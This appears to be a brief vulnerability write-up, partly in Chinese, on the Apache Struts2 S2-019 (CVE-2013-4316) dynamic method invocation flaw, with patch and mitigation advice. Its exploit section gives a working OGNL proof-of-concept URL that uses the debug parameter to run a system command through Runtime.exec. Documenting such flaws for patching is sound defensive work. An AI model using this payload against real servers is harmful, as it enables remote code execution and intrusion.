struts2 CVE-2013-4316 S2-019 Dynamic method executions Vul
catalog
1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix
1. Description
Dynamic Method Invocation is a mechanism known to impose possible security vulnerabilities, but until now it was enabled by default with warning that users should switch it off if possible.
Relevant Link:
http://struts.apache.org/docs/s2-019.html?spm=5176.775974950.2.8.iJuruO
2. Effected Scope
3. Exploit Analysis
0x1: POC
需要目标struts2应用开启debug模式
http://localhost:8080/crazyit/register.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField
%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,
@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29
/*
http://localhost:8080/crazyit/register.action?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField
('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),
@java.lang.Runtime@getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')
*/
Relevant Link:
http://qqhack8.blog.163.com/blog/static/114147985201463194423958/
http://qqhack8.blog.163.com/blog/static/114147985201402743220859
4. Principle Of Vulnerability
5. Patch Fix
0x1: upgrade struts2
In Struts 2.3.15.2 the Dynamic Method Invocation is to false by default. Another option is to set struts.enable.DynamicMethodInvocation
to false in struts.xml
<constant name="struts.enable.DynamicMethodInvocation" value="false"/>
0x2: 手动修复方法
1. 使用过滤器对相关关键字进行拦截,需要修改struts.xml,并重启struts2应用进程
2. 动态关闭struts2的属性开关(hotfix)
3. 使用waf进行URL层面的拦截
Relevant Link:
http://www.fjssc.cn/html/research/notice/2014/0127/78.html
Copyright (c) 2015 Little5ann All rights reserved